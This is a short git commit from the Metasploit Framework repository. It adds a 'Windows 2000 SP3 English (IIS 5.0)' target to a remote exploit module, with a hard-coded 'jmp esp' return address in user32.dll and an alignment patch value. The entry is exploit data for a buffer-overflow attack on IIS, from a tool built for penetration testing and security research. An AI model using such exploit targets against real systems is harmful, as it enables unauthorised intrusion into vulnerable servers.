Added Aki Immonen's target for Windows 2000 SP3, thanks Aki!

git-svn-id: file:///home/svn/framework3/trunk@6995 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Stephen Fewer 2009-09-02 21:24:34 +00:00
parent 41ab69c600
commit 1184f01742
1 changed files with 8 additions and 0 deletions

View File

@ -59,6 +59,14 @@ class Metasploit3 < Msf::Exploit::Remote
'Patch' => 0x7ffd7ffd # works for off-by-two alignment
},
],
[
'Windows 2000 SP3 English (IIS 5.0)',
{
'Platform' => 'win',
'Ret' => 0x77e42ed8, # jmp esp in user32.dll (English / 5.0.2195.7032)
'Patch' => 0x7ffd7ffd # works for off-by-two alignment
},
],
],
'DisclosureDate' => 'Aug 31 2009',
'DefaultTarget' => 0))